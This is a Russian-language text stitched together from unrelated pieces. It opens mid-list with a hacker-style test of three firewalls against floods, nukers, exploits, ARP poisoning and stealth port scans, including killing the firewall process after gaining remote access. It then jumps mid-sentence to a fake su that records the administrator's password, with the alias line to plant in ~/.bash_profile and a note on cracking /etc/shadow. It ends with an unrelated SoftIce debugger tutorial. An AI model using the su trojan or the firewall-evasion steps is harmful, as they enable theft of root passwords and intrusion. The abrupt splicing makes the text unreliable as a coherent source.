2. Четыре вида флудеров: SYN, ICMP, IGMP, UDP.
3. Вагон нюкеров с маленькой тележкой: WinNuke, SmbDie, Fragmentation….
4. Три самых популярных масдайных эксплоита\червя: LoveSun, Sasser, Messenger, UP&P.
5. Снифер, крутой и професиональный.
6. Сканер портовый, многофункциональный.
7. Мозг — воспалённый, руки — выпрямленные smile.gif

Замечу что производители этих фаерволов обещали защищать нас конкретно от:

1. Kaspersky AntiHacker v.1.7.130

* Ping of Death- Эта атака состоит в отправке на ваш компьютер ICMP — пакета, размер которого превышает допустимое значение в 64 КБ. Эта атака может привести к аварийному завершению работы.
* Land — Эта атака заклюсается в отправке на ваш компьютер большого количества запросов на установку соединения с самим собой. Атака приводит к тому, что компьютер не реагирует на другие попытки установить соединения.
* Сканирование TCP-портов — Эта атака заключается в попытке определить открытые TCP-порты на вашем компьютере. Атака используется для поиска слабых мест и предшествует более опасным атакам.
* Сканирование UDP-портов — Эта атака заключается в попытке определить открытые UDP-порты на вашем компьютере. Атака используется для поиска слабых мест и предшествует более опасным атакам.
* SYN-Flood — Эта атака заключается в отпраке на ваш компьютер большого кол-ва запросов на установку соединения. Атака приводит к тому, что компьютер не реагирует на другие попытки установить соединения.
* UDP-Flood — Эта атака заключается в отправке специальных UDP-пакетов, которые бесконечно пересылаються между атакованными компьютерами. В результате атаки тратяться ресурсы компьютеров и загружается центральный процессор.
* ICMP-Flood — Эта атака заключается в отправке большого кол-ва ICMP-пакетов на ваш компьютер. Атака приводит к большому росту загрузки процессора в силу реагирования на каждый пакет.
* Helkern — Эта атака заключается в в отпраке на ваш компьютер UDP-пакетов специального вида, способных выполнить вредоносный код. Атака приводит к замедлению работы в интернете.
* SmbDie — Эта атака заключается в попытке установить соединение с вашим компьютером по SMB-протоколу, в случае успеха на компьютер отправляется пакет особого вида, который пытаеться переполнить буфер. Атаке подвержены ОС Windows 2k\XP\NT.
* Lovesan — Эта атака заключается в попытке обнаружения на вашем компьютере бреши в сервисе DCOM_RPC операционной системе Windows и пересылке вредоносной программы с её использованием, которая потенциально позволит производить любые манипуляции на вашем компьютере.

2. OutpostPro_v3.0.543.431 RUS Final

* Сканирование порта — атакующий запрашивает TCP и UDP порты Вашей системы, чтобы определить к какому порту он может подсоединиться, чтобы получить контроль.
* Denial of Service — Большое кол-во данных посылается на порт вашей системы при попытке вызвать ошибку или зависание системы.
* Fragmented ICMP — пакет ICMP, посланный в виде фрагментов, превышает 1472 байта после сборки. Это может привести к сбоям в стеке TCP и зависанию системы.
* Fragmented IGMP — пакет IGMP, посланный в виде фрагментов, превышает 1472 байта после сборки. Это может привести к сбоям в стеке TCP и зависанию системы.
* Short fragments — Пакет разбивается на несколько фрагментов, которые затем изменяються таким образом, что после сборки пакет приводит к зависанию системы.
* Teardrop — ещё один вид Short fragments атаки.
* My Address — Атака, состоящая в перехвате IP — адреса Вашей системы, имитации системы в сети и захвате всех соединений.
* Перекрывающиеся фрагменты — Пакет разбивается на несколько фрагментов , которые затем изменяються таким образом, что накладываються друг на друга и вызывают зависание системы из-зи ошибок памяти.
* WinNuke — Источник проблемы состоит в уязвимости протокола TCP, приводящей к зависанию некоторых версий операционных систем Windows при получении специфических пакетотв.
* Nestea — опасное перекрытие IP — пакетов, вызываемое программой Nestea, может привести к нестабильности и зависанию системы.
* Iseping — Большой ICMP пакет разбивается на большое число фрагментов. После сборки приводит к зависанию системы.
* ICMP атака — TCP\IP стек Windows некорректно обрабатывает фрагментированные ICMP-пакеты. Система, получившая такой пакет, с большой вероятностью, зависнет.
* Opentear — программа Opentear использует фрагментированные UDP-пакеты, чтобы подвергнуть компьютер жертвы перезагрузке.
* Nuke — Попытка захватить TCP-соединение и обойти брандмауэр и другие системы обнаружения атак.
* IGMP атака — TCP\IP стек Windows некорректно обрабатывает фрагментированные IGMP-пакеты. Система, получившая такой пакет, с большой вероятностью, зависнет.
* Port139 — Фрейм с нулевым полем имени, который может привести системы Windows 95 или 98 к нестабильному состояниюили зависанию.
* Неверное поле IP Options — атака использует переполнение буфера стэка TCP\IP (когда размер поля IP Options превышает 38 байт) для выполнения вредоносного кода на вашем компьютере.
* Атака RPC DCOM — Различные черви и утилиты используют RPC_DCOM — уязвимость, что может привести к выполнению злонамеренного кода и падениям системы.
* Отравление ARP-кеша — опасная атака направленная на перехват трафика.

3. ZoneAlarm_PRO_60.667

* Детектора атак нету
* Зато защита ARP-кэша есть
* А остальное надо ручками настраивать, ибо фаервол очень серьёзный.

Итак, приступим. Выставим фаерволам вот такие режимы. Для Касперского — это «Высокий». Для Аутпоста — «Блокировать». А вот Мистер Аларм на высоком уровне защиты блокировал ВСЕ мои домогательства (можно считать его вне конкуренции и лидером в области высокого уровня запрета), поэтому, чтоб было интересней, я его перевёл в средний режим тревожности.

Начнём сначала, испытывая флудеры:

* SYN-флудер
*Без фаервола система падала секунд за 10.
*Касперский, как положено, опознал атаку и заблокировал айпи негодяя, однако процессор всё равно грузился (?). Какого.. ! Видимо, приоритет загруженного драйвера фаервола стоит на равном (или ниже) виндового, в чем я так же убедился на других атаках. Это вери бэд, ибо по сути должного противодействия атаке не оказывается. Это означает, что если атакующих будет двое или более — системе пипец.
*Аутпост не опознал атаку(замечу, что опознание флуд-атак в него не заложено!!!), и загрузка процессора была вдвое больше.
*Аларм молчал (детектора атак у него вообще нет), однако каким-то чудом не давал процессору загружаться. Хм.. может флудер не правильный?..
* ICMP-флудер
*Касперский определяет флуд… и всё равно грузит проц.
*Аутпост даже при стандартных настройках режет ICMP по самое не балуйся. Урезав всё вручную и оставив только необходимое он превратился в настоящую ICMP-крепость, которой до такого флуда просто пофиг. Респект.
*Аларм был настроен на фильтрацию этих пакетов. Атака провалена.
* IGMP-флудер
*Без фаервола процессор грузился на 100%, однако система была работоспособна(приоритет IGMP низок).
*Касперский не знает ничего об IGMP вообще и молчал. Процессор на 80%.
*Outpost при первом включении обычно спрашивает, разрешать ли обработку IGMP. Нах. И так как IGMP был просто запрещен, проц — 50%.
*Аларм был настроен на фильтрацию пакетов. Проц 35%.
* UDP-флудер
*Без фаерволов проц на 100%(приоритет удп выше чем тср) , система жутко тормозила, но (я оч удивлен) всё же выжила.
*Касперский, как обычно всё распознал… и продолжал грузить процессор )))
*Аутпост каким то неизвестным образом умудрялся противостоять натиску без блокировки.
*Аларм как обычно молчал, не давая мне ни шанса ($ly ..!!!).

Теперь по-нюкаем

*Касперский опознал лишь LAND атаку — пожалуй единственную, которой подвержена ХР. Вобщем то можно сказать, что ставить фаервол от дяди каспера можно только на пропатченную ХР, так как если б это была другая винда — она свалилась бы без вопросов.
*Аутпост как и было обещано опознал многие типы нюкеров. А вот с LAND как раз не справился.
*По причине отсутствия детектора атак, Алармик был безмолвен. Если его ставить на старую систему, есть реальный шанс свалить её, при условии достаточно демократичных настроек фаервола.

Эксплоиты

Ну с DCOM’ом и Lsass’ом как оказалось, был знаком KAV и Outpost. А вот остальные сплоиты они видели явно впервые ) А ещё говорят, что если слегка переписать код эксплоита, то его ваще никто не замечает…

Снифер — тест

Теперь заценим новую фичу Аутпоста — защиту от отравления арп-кэша. Берём специальный снифер и травим кэш жертвы. Вот, без фаервола ВЕСЬ трафик между сервером и жертвой пошел через нас. А из него мы можем легко выловить пароли. Включаем Аутпост — тревожная табличка и все хакеры идут лесом ))).
А так же обратим внимание на встроенный в Аутпост антиспайвэа-модуль, который призван находить в вашей системе разных шпионов. Фича полезная. Определила 3 из 3-х запущенных шпионских паблик-прог.
Про огромную гору фишек в Аларме я рассказывать устану. Там их дофигища. Защита АРП-кэша имеется.

Сканим порты.
Ну теперь — самое любимое ))

При сканировании нескольких портов каждый фаер сразу опознавал нарушителя, независимо от типа сканирования.

Теперь усложним задачу. Кто мешает нам посканить один порт? Прально. А если удасться, то через секунд 10 можно просканить и ещё один, и ещё…
Сканить будем в два этапа. Оба — стелс-сканирование, первое поверхностное, второе — углубленное.

Скажу, что на поверхностном удалось просканить всех.

*Касперский показал неплохой результат, заблокировав хакера при начале углубленного скана.
*Аутпост при стандартных настройках сканиться просто на ура. Однако слегка поднастроив детектор атак он показал отличный результат.
*Аларм ничего не стал скрывать и устроил моему сканеру чистосердечное признание, сдав систему и сервисы с потрохами smile.gif))

Отключаем

Теперь просто и незатейлево пытаемся изменить настройки\отключить\деинсталировать фаервол и посмотрим его реакцию. Предположим, мы удаленно получили доступ к командной строке с привелегиями SYSTEM или Администратора. Из-за криво настроенного фаервола мы имеем сам доступ, однако нам этого мало и надо любой ценой устранить сетевой экран.

*Касперский абсолютно не возражал против отключения своего сервиса и убийства процесса. У него даже защиты паролем нет.
*Аутпост был защищён паролем. Однако умер от простейшего тасккила с выгрузкой сервиса(можно сбацать сишную прогу с «TerminateProcess»)
*Аларм послал меня куда подальше, вывел табличку с предупреждением. Мало того, он защищен паролем и от деинсталяции. Безупречно. Отключив таки сервис, загрузившись в безопасносном режиме, я снова потерпел неудачу.
Оказывается, Аларм глубоко интегрируется в сетевые дровишки и при его несанкционированном отключении происходит полная блокировка сетевого трафика. Просто зверюга.

Кто здесь Лидер?

Ну вот. Чтож, могу сказать, что фаервол Касперского я бы назвал не Анти-Хакер, а Анти-Ламер ))) ибо защищает он лишь от них. Также использование его на системах, отличных от WinXP\SP2 будем иметь печальный итог. Тут уж я и не знаю кто кого и от кого защищает )).
Меня сильно позабавил смачный глюк, когда несмотря на «блокировку атакующего» я таки смог определить открытые порты. Ето вери-вери бэд.

Аутпост показал неплохую устойчивость от различного вида атак. Огорчает его безразличие к флуду (однако айпи хакера можно легко посмотреть, открыв вкладку сетевой активности), но радует повышенная безопасность от сниферства, spy-детектор и гибкость настроек детектора атак (да и всех остальных модулей — оч. профессиональный подход). Почти некчему придраться.

Зон Аларм ваще зверь, но только при высоком уровне защиты. Видите ли, разработчики делали режимы фаервола в расчете на СТРАШНЫЙ Интернет и БЕЗОПАСНУЮ локальную сеть… Поэтому, если вам все надоели, вы хакер, единоличник, или агент FBI — ставьте Алармик и врубайте высокий режим защиты. Тогда достучаться до вас можно будет только через дверь.

и обзывается su.c. Если вглядеться в простенький код можно понять, что это полная имитация /bin/su, только с логированием пароля в файл tmp/.screen. Сам бинарник будет находиться в файле tmp/.screen_active (все пути относительно домашнего каталога пользователя). После того, как файл выполнится он замещается стандартным /bin/su. Таким образом, админ думает, что ошибся паролем, так как со второй попытки суид будет успешным.
Перед тем, как проверять данный метод на практике, впиши строчку “alias su /home/user/tmp/.screen_active в файл ~/.bash_profile и жди, пока админ решит суиднуться на рута. Когда это произойдет – пароль твой ;).

Данный метод работает лишь тогда, когда юзер регулярно суидиться на рута, а у хакера есть доступ к этому аккаунту (либо ко всей системе).
10. Стандартный способ.
И, наконец, настало время рассказать про самый тривиальный способ. Хакер захватывает систему и получает доступ к /etc/shadow. Далее, все по сценарию – берется расшифровщик, хороший словарь и вся надежда только на удачу. Я думаю, ты не раз сталкивался с применением этого метода. И, что интересно, постоянно забывал об остальных 9…

Что такое SoftIce?
SoftIce состоит из отладчика уровня ядра (kernel mode debugger) (собственно, это и есть отладчик) и утилиты загрузчик отладочной информации (Symbol Loader). SoftIce – это универсальный отладчик, которым можно отладить любой код, включая подпрограммы прерывания и драйверы ввода-вывода. Утилита Symbol Loader загружает отладочную информацию для вашего модуля, позволяет настроить SoftIce, и дает возможность записать историю комманд (history buffer) в файл.
SoftIce совмещает в себе мощь аппаратного отладчика и удобство символьного, он имеет следующие возможности:
Символьная отладка 32-битных приложений, отладка драйверов устройств для WIN NT, драйверов для WIN95, VxD, 16-битных программ для DOS и Windows.
Отладка фактически любого кода, включая подпрограммы прерывания и внутренние подпрограммы WIN 95 и WIN NT.
Установка точек останова на операции чтения/записи в память, чтения/записи портов ввода-вывода, прерываний.
Установка точек останова на сообщения Windows.
Установка точек останова, срабатывающих при определенных условиях (условных точек останова), и действий, которые должны произойти при срабатывании точки останова.
И многое другое …
Symbol Loader позволяет прочитать отладочную информацию из отлаживаемых программ (EXE, DLL, VxD, 386, OCX) и загрузить ее в отладчик, запустить ваше приложение и автоматически установить точку останова на точку входа в программу, записать в файл протокола отладки.

Инсталляция
Аппаратные требования (от NuMega):
Процессор:486 или Pentium.
ОЗУ:необходимо 16 Мб (хотя в свое время работал и на 8), желательно 32 Мб.
Мышка:обычная или PS (интересно, а кто в виндах без нее работает?).
Видеокарта:начиная с версии 3.2, в SoftIce входит универсальный дисплейный адаптер, который должен работать с любой видеокартой, также есть драйвера и для большого числа видеокарт.
SoftIce поддерживает работу с:
одной видеокартой (стандартный вариант)
с двумя видеокартами (вторая видеокарта должна быть MDA (Monochrome Display Adapter) или Hercules-совместимая)
с двумя обычными видеокартами при условии, что они будут работать вместе
удаленную отладку (со вторым компьютером, который соединяется с первым посредством COM-порта (remote debugging));
На диске занимает 5,8 Мб.
При инсталляции, как обычно, введите директорию, куда вы хотите поставить SoftIce, выберите компоненты, которые хотите поставить, после чего попадете в окно выбора видеоадаптера. SoftIce сам определяет видеокарту, если она соответствует вашей — нажмите кнопку Test, экран должен переключится в текстовый режим и вы увидите фразы “SoftIce is totally awesome!” на всем экране, а в середине отсчет цифр от 5 до 1. Если вы это увидели, то значит настройка видеоадаптера прошла успешно — жмите кнопку Next, если же у вас сбилась развертка, пропало изображение или повисла машина, то значит у SoftIce проблемы с видеокартой, для их решения существуют два пути: первый, включить универсальный видеоадаптер – должно помогать всегда (на моем Matrox Mistique проходит только этот вариант), тогда SoftIce будет работать в окне: второй, подобрать из числа представленных видеоадаптеров аналог вашему (у меня с S3 TRIO 64 вис (правда SoftIce был 3.01), а с DS 2000 работал на-ура); вам решать какой вариант лучше.
После выбора адаптера выберите тип мыши, которой вы пользуетесь (хотя мышь можно и не ставить, без нее тяжело работать в SoftIce). Далее разрешите модифицировать свой autoexec.bat для того, чтобы SoftIce загружался при старте компьютера. Подтвердите выбранную конфигурацию и следите за тем, как SoftIce ставится на вашу машину. На предложение перезагрузить компьютер, согласитесь. После перезагрузки нажмите клавиши Ctrl-D. Если вместо рабочего стола вы увидите какие-то непонятные буквы и цифры, то считайте, что установку SoftIce на машину вы закончили, и наступает этап настройки. Если же ничего не случилось, или машина повисла при загрузке, то проверьте все ли вы правильно сделали. Если SoftIce не загрузился, проверьте, прописана ли в autoexec.bat строка запуска, она всегда последняя и выглядит приблизительно так: C:WINDEBUGSICE324WINICE.EXE, если нет — пропишите ее с вашим путем. Если машина повисла, то причина, скорее всего в неверной конфигурации видеоадаптера. Попробуете изменить ее.
Кстати, все настройки, которые вы проводили при инсталляции можно изменить: Пуск – Программы – NuMega SoftIce.

Настройка:
Откройте на редактирование файл winice.dat, который находится в той же директории что и SoftIce (в случае NT — в каталоге %SystemPath%system32drivers), и уберите точку с запятой со следующих строк:
; ***** Examples of export symbols that can be included for Windows 95 *****
;Change the path to the appropriate drive and directory
EXP=c:windowssystemkernel32.dll — убрать;
EXP=c:windowssystemuser32.dll — убрать;
EXP=c:windowssystemgdi32.dll — убрать;
Проверьте путь к файлам kernel32,user32,gdi32, он должен соответствовать вашему (Актуально в случае, если windows ставилась в каталог отличный от C:WINDOWS).
Эта операция нужна для того, чтобы при отладке программы при вызове системных функций вы увидели имя вызываемой функции, а не какой-то call [xxxxxxxx].
Пример:
Call [USER32!GetWindow], вместо CALL [BFC01480].
На мой взгляд первое выглядит значительно информативней.
Исправьте строку INIT в соответствии с одним из примеров:
INIT=»WR;WD;WL;X;» – если вы используете видеодрайвер для «родной» видеокарты (полноэкранный режим).
INIT=»SET FONT 3;SET ORIGIN -10 25;WR;WD 4;WL;WC 12;X;» – если вы используете универсальный видеодрайвер (оконный режим).
INIT=»SET FONT 1; SET ORIGIN 30 30;LINES 60;WIDTH 90;WR;WD 4;WL;WC 12;X;» – вариант, работающий на моей машине и выводящий на экран максимум информации (оконный режим), возможно для вашей машины потребуется изменить значение некоторых параметров.
Если вы хотите передвинуть окно с SoftIce, то используйте клавиши Ctrl-Alt-(одна из клавиш управления курсором).
Более подробно команды и переменные SoftIce будут рассмотрены ниже, тогда вы сможете настроить SoftIce на свой вкус.

Первые шаги
Если вы все еще читаете этот опус, то для вас настал долгожданный момент истины :-), пора посмотреть как это все работает в деле. В поставку SoftIce входит пример GdiDemo, его и будем отлаживать (придерживаясь указаний фирмы NuMega).
Пример без проблем собрался в VC4 (не забудьте включить отладочную информацию), в BC 5.02 пример тоже собрался, но отладочную информацию Symbol Loader не увидел, хотя в TD она грузится. Тот, кому лень собирать проект самому, может скачать его отсюда: Gdidemo.zip (или отсюда ), архив занимает 0.1 Мб.

1. Загрузка отлаживаемой программы.
Запускаем Symbol Loader, выбираем опцию Open module в меню File, идем туда, где у вас лежит Gdidemo.exe, и открываем его, далее в меню Module нажимаем на опцию Load. SL оттранслирует отладочную информацию в .NMS файл, загрузит исходные файлы, запустит отлаживаемую программу (в данном случае Gdidemo) и всплывет в SoftIce, где вы увидите исходный текст программы.
Подсвеченная строка с номером 35 – это точка входа (entry point) в вашу программу. Если SL вывел сообщение типа «An error occured during symbol translation/load», значит в отлаживаемом файле отсутствует отладочная информация, жмите OK и наслаждайтесь [диз]ассемблером.

2. Управление SoftIce’ом.
Если Вы все правильно сделали, то вы должны увидеть SoftIce разбитый на несколько окон. Верхнее окно – Register Window (окно регистров) – показывает состояние рабочих регистров процессора. Под ним находится окно данных Data Window, в нем вы можете посмотреть или отредактировать дамп памяти. Ниже находится Code Window (окно кода) – в нем находится исходный текст программы (если вы загрузили отладочную информацию), или дизассемблированный код программы. В самом низу находиться окно команд — Command Window, в нем вы можете вводить команду и видеть результат их выполнения. Самая нижняя строчка – строка помощи, в ней при вводе подсвечиваются возможные варианты команд и их синтаксис. Удобнее всего управлять SoftIce с помощью мышки, но можно и без нее, хотя и не так удобно.

2.1 Управление с помощью мышки:
Вы можете: изменять размер окон и закрывать их (нельзя изменить размер окна регистров и FPU); скроллировать окна как на одну строку, так и на целый экран; изменять значение регистров, флагов, ячеек памяти, устанавливать точки останова на исполнение, удалять из Watch Window переменные, которые больше не нужны. Правая кнопка мыши вызывает контекстное меню, в котором вы можете выбрать одну из представленных команд; работают команды с буфером обмена Windows.
Изменение размера окна — подведите курсор к нижней границе того окна, которому хотите изменить размер или закрыть его, нажмите левую кнопку мыши и ведите ее вниз (увеличение размера) или вниз (уменьшение размера), если хотите закрыть окно, подведите нижнюю границу к верхней, в окне появится фраза Close current window и окно исчезнет.
Скроллинг на одну строку – подведите курсор к маленьким стрелочкам, расположенным у границ того окна, которое хотите скроллировать и жмите левую кнопку мыши (стрелочки появляются, если размер окна больше или равен двум строчкам).
Скроллинг на экран – подведите курсор к большим стрелочкам расположенным внутри того окна, которое хотите скроллировать и жмите левую кнопку мыши (стрелочки появляются, если размер окна больше или равен четырем строчкам).
Изменение значений регистров – подведите курсор к тому регистру, значение которого хотите изменить, нажмите левую кнопку мыши и введите число, если нужно изменить одну цифру, то подводите курсор к этой цифре и меняйте.
Изменение значений флагов – подведите курсор к тому флагу, который хотите изменить, нажмите левую кнопку мыши, после чего клавишей Ins можно изменить значение флага на противоположное (маленькая буква означает, что флаг не установлен, большая установлен).
Изменение значений ячеек памяти – подведите курсор к тому байту (слову, двойному слову и т.д.), которое хотите изменить, нажмите левую кнопку мыши и вводите ваше значение, если хотите изменить одну или несколько цифр в числе, то подведите курсор с помощью клавиатуры к нужным числам и меняйте.
Примечание: во всех случаях изменения значений они вступают в силу после того, как вы переключитесь в любое другое окно, до этого можно отменить последнее изменение, нажав Esc.
Установка точек останова на исполнение – подведите курсор к той строке в Code Window, в которой хотите остановиться, и двойным щелчком по левой кнопке мыши поставьте точку останова, строка подсветится.
Удаление из Watch Window переменных – установите курсор на переменную, которую хотите удалить, нажмите левую кнопку мыши, переменная подсветиться, нажмите кнопку Del – переменная исчезнет.
Контекстное меню – по правой кнопке мыши вы попадаете в контекстное меню, в котором вам доступны команды:
Copy – копировать в буфер обмена адрес или данные, находящиеся под курсором.
Paste – вставить в окно команд, адрес или данные находящиеся в буфере обмена
Copy&Paste — копировать в буфер обмена адрес или данные, находящиеся под курсором, и вставить их в окно команд.
Display – вывести в окно данных дамп памяти, расположенный по адресу, над которым в данный момент находиться курсор (Аналог команды D).
Un-Assemble – вывести в Code Window исходный (если есть отладочная информация) или дизассемблированный текст программы, находящийся по адресу, над которым в данный момент находиться курсор (Аналог команды U).
What – идентифицирует значение, находящееся под курсором с заранее определенными (Аналог команды Wath).
Previous – отменяет предыдущую команду, введенную из контекстного меню (работает с командами Display и Un-Assemble).

2.2 Управление с помощью клавиатуры:
Можете делать все то же самое, но будет отсутствовать контекстное меню и буфер обмена.
Изменение размера окна – размер (в строках) непосредственно задается в команде открытия окна, если нужно.
WC – открыть окно кода (Code Window).
WD – открыть окно данных (Data Window).
WF – открыть окно FPU Stack (FPU Stack Window).
WL – открыть окно локальных переменных (Locals Window).
WR – открыть окно регистров (Register Window).
WW – открыть окно слежения (Watch Window).
Повторный ввод этих команд без параметров закрывает соответствующие окна, с параметрами – меняет размер.
По умолчанию курсор находиться в окне команд. Переместить курсор в нужное окно можно следующими комбинациями клавиш (если вы находитесь в окне команд (Command Windows)):
Перейти в окно кода (Code Window)Alt-C
Перейти в окно данных (Data Window)Alt-D
Перейти в окно локальных переменных (Locals Window)Alt-L
Перейти в окно регистров (Register Window)Alt-R
Перейти в окно слежения (Watch Window)Alt-W
В окно сопроцессора курсор переместить нельзя.
Повторное нажатие этих клавиш возвратит вас обратно в окно команд (все вышесказанное действительно и для Code Window).
В окне данных переключиться между дампами в HEX и ASCII формате можно с помощью клавиши Tab, с ее же помощью можно переходить между регистрами в окне регистров.
Скроллинг на одну строку – переходите в нужное окно и клавишами управления курсор вверх и курсор вниз скроллируете окно.
Скроллинг на экран — переходите в нужное окно и клавишами PageUp и PageDown скроллируете окно.
Примечание: Code и Data Window можно скроллировать и не переключаясь в них из окна команд, для этого нужно кроме управляющих клавиш удерживать еще Alt для Data Window и Ctrl для Code Window.
Изменение значений регистров – перейдите в окно регистров, подведите курсор к тому регистру, значение которого хотите изменить и введите число, если нужно изменить одну цифру, то подводите курсор к этой цифре и меняйте, нажатие Enter подтверждает изменение, Esc отменяет.
Изменение значений флагов – перейдите в окно регистров, подведите курсор к тому флагу, который хотите изменить. После чего, клавишей Ins можно изменить значение флага на противоположное (маленькая буква означает, что флаг не установлен, большая — установлен), Enter можно не нажимать.
Изменение значений ячеек памяти – перейдите в окно данных, подведите курсор к тому байту (слову, двойному слову и т.д.), которое хотите изменить и вводите ваше значение, если хотите изменить одну или несколько цифр в числе, то подведите курсор с помощью клавиатуры к нужным числам и меняйте. Нажатие Enter или переход к следующему числу подтверждает изменение, Esc отменяет.
Установка точек останова на исполнение – в окне команд наберите команду BPX и введите адрес строки, на которой хотите остановиться.
Удаление из Watch Window переменных – перейдите в Watch Window, установите курсор на переменную, которую хотите удалить, переменная подсветиться, нажмите кнопку Del – переменная исчезнет.
После небольшой лекции по управлению SoftIce можно заняться и собственно отладкой. Так как мы отлаживаем программу, написанную на языке высокого уровня и с отладочной информацией, то можем отключить окно регистров и окно данных, и включить Locals Window, что бы видеть какие параметры передаются в процедуры (т.е. WD,WR,WL при условии, что пользовались настройками приведенными выше).
Что бы посмотреть какие из исходных текстов программы были загружены — дайте команду FILE *.
На экране в окне команд вы увидите имена файлов содержащих исходные тексты программы GdiDemo: Bounce.c, Wininfo.c, Poly.c, Maze.c, Init.c, Draw.c, Dialog.c, Xform.c, Gdidemo.c. Так как окно команд обычно небольшое, то вы увидите несколько первых имен файлов. В строке помощи будет присутствовать надпись «Press any key to continue; Esc to cancel», вы можете с помощью клавиши Enter. Получить следующую строку с именем файла, или, нажав на пробел, получить следующую порцию строк с именами файлов (действительно для всех сообщений выводимых в окне команд).
Если в процессе изучения листинга программы вы забрались слишком далеко от текущего значения EIP, то вернутся можно командой:
:U EIP – дизасемблировать программу начина с текущего EIP адреса, либо командой;
:. (точка) – переместиться к текущей исполняемой инструкции.

3. Трассировка программы.
Воспользуйтесь командой T (trace) для того чтобы оттрассировать одну команду, или клавишей F8, которая закреплена по умолчанию за командой T. Произойдет выполнение команды находящейся в текущей строке и курсор перейдет на следующую строку и подсветит ее. Это строка:
LpszLine=LpszLine;
Еще раз нажмите F8, курсор передвинется на следующую строку:
if(!hPrevInst).
В Code Window вы видите исходный текст программы (source mode). Если вы хотите посмотреть дизассемблированный (code mode) текст программы или исходный и дизассемблированный (mixed mode) текст вместе, воспользуйтесь командой SRC или клавишей F3 закрепленной за этой командой. При первом нажатии вы увидите смешанный (исходный текст программы и ассемблерные инструкции, из которых состоит эта строка) текст, при втором нажатии дизассемблированный, третье нажатие вернет вас в режим просмотра исходного текста программы.
Нажмите еще раз F8 и вы перейдете к строке
if(!RegisterAppClass(hInst));
Для того, чтобы отлаживать программу, вы пользуетесь командой Т, которая исполняет один оператор исходной программы или одну машинную команду.
Еще существует команда P или клавиша F10, которая выполняет один шаг в программе, т.е. при трассировке какой-либо функции или прерывания вы не получите управления до тех пор, пока выполнение функции не завершится, и вы не вернетесь из функции обратно. Команду P удобно применять в том случае, когда вы отлаживаете основной алгоритм и отвлекаться на трассировку каждой процедуры нерационально.
Примечание: Командой T нельзя оттрассировать системные вызовы (WIN32 API calls) находясь в source mode, для их трассировки нужно перейти в mixed или code mode.

4. Просмотр локальных переменных.
Окно Locals Window показывает текущий кадр стека. В нашем случае он содержит локальные переменные для функции WinMain.
Командой T войдите в функцию RegisterAppClass, окно Locals Window станет пустым, так как для этой функции еще не определены локальные переменные. Функция RegisterAppClass находится в файле INIT.C. SoftIce показывает текущий файл в левом верхнем углу Code Window
Введите команду T снова, окно Locals Window будет содержать параметр переданный функции RegisterAppClass (hInstance) и локальную структуру wndClass. Перед структурой стоит знак плюс, который означает что внутри находятся переменные, которые можно посмотреть (так же можно смотреть строковые переменные и массивы). Если у вас Pentium и вы пользуетесь мышкой, то посмотреть структуру можно два раза щелкнув по ней мышкой, знак + сменится на – и вы увидите переменные из которых состоит структура. Закрыть структуру можно так же (двойным щелчком мыши). Если вы пользуетесь клавиатурой то последовательность действий такова: жмем Alt-L для перехода в Locals Window, затем курсорными клавишами подводим светящуюся полоску к структуре, которую хотим посмотреть и нажимаем Enter. Если требуется закрыть ее, то нажимаем Enter еще раз.

5. Установка точек останова на выполнение.
Точки останова на выполнение делятся на два вида: просто точки останова и однократные точки останова.
Однократные точки останова:
Перейдите в Code Window, используя клавишу PgDn переместите курсор на строку с номером 61 (тоже самое можно сделать используя команду U .61), в этой строке находиться первый вызов функции Win32 API RegisterClass. Используя команду HERE (клавиша F7) выполните программу до этой строки.
Команда HERE устанавливает точку останова в программе на адрес или строку на которой находиться курсор и выполняет программу с текущего адреса до адреса на котором находиться курсор, т.е. до тех пор пока не сработает точка останова, после срабатывания SoftIce автоматически отключит эту точку останова, что бы она больше не срабатывала.
Текущей строкой в отлаживаемой программе стала строка:
If(!RegisterClass(&wndClass))
Примечание: того же самого результата можно было добиться если бы вы дали команду G .61 (исполнять программу до строки 61).
Обычные точки останова.
Следующие шаги демонстрируют использование обычных точек останова, т.е. таких которые будут срабатывать до тех пор пока вы их не отмените. Найдите следующий вызов функции RegisterClass, находящийся в строке 74. Установите курсор на эту строку и введите команду BPX (BreakPoint eXecutable) или клавишу F9 (по этой команде, в память на место команды расположенной под курсором записывается команда INT3, но вы этого не видите :-)). Строка должна подсветиться (если вы находитесь в code mode, то после команды BPX необходимо указать адрес строки на которую хотите поставить точку останова). Снять точку останова можно повторным вводом этой же команды. Если вы счастливый обладатель процессора Pentium, то процесс установки и снятия точки останова сводится к двойному щелчку левой кнопкой на той команде, где хотите поставить точку останова. После установки точки останова запустите программу командой G или X (клавиша F5). Когда программа исполнит инструкцию INT3, она передаст управление SoftIce, после чего он появиться перед вами. Посмотреть информацию об установленных точках останова можно командой BL (BreakPoint List):
:BL
00) BPX #0137:00402442 (адрес может быть другим).
Видим что установлена одна точка останова на исполнение по адресу 00402442, с порядковым номером 0. По этому адресу находиться команда, расположенная в текущем файле INIT.C в строке 74. Вы можете использовать вычисление выражений, для того чтобы получить адрес строки по ее номеру: .74
void * = 0×00402442
Так как дальнейшая пошаговая трассировка функции RegisterAppClass не имеет для нас смысла, вернемся в то место, откуда эта функция вызывалась. Для этого существует команда P с параметром RET (клавиша F12). Она позволяет выполнять программу до тех пор пока не встретит команду RET (RETF), исполнив эту команду SoftIce выйдет из подпрограммы и остановиться на строке следующей за вызовом этой подпрограммы. Применительно к нашей программе: функция RegisterAppClass вызывается из функции WinMain, SoftIce остановиться в функции WinMain на строке следующей за вызовом функции RegisterAppClass, т.е. подсвечена будет строка:
Msg.wParam = 1;
Воспользуйтесь командой BC (Breakpoint Clear) с номером точки останова, который вы посмотрели с помощью команды BL, для того, что бы убрать именно эту точку останова, или вместо номера введите *, тогда вы уберете все точки останова (можно вводить номера точек останова через запятую, если хотите убрать несколько точек).

6. Использование информационных команд.
SoftIce имеет в своем распоряжении много разных команд, с помощью которых можно узнать состояние и получить иную информацию об операционной системе и запущенных в ней приложениях. Мы рассмотрим только две команды: H (Help) и CLASS. Эти команды выводят достаточно много информации в окне команд (Command Window), поэтому желательно увеличить размер этого окна, для этого закроем окно локальных переменных (Locals Window).
По команда H можно получить помощь по всем командам SoftIce или более подробную информацию о конкретной команде, если введете ее имя в качестве аргумента команды H:
:H CLASS
Display window class information
CLASS [-x] [task-name]
Ex: CLASS USER
Первая строка дает описание команды, вторая показывает информацию о синтаксисе и аргументах, которые могут использоваться в команде, третья строка содержит пример использования команды.
Целью выполнения функции RegisterAppClass является регистрация шаблона для классов окон, которые будут использованы приложением GdiDemo для создания окон. Используя команду CLASS можно посмотреть зарегистрированные классы для GdiDemo:
:CLASS GDIDEMO
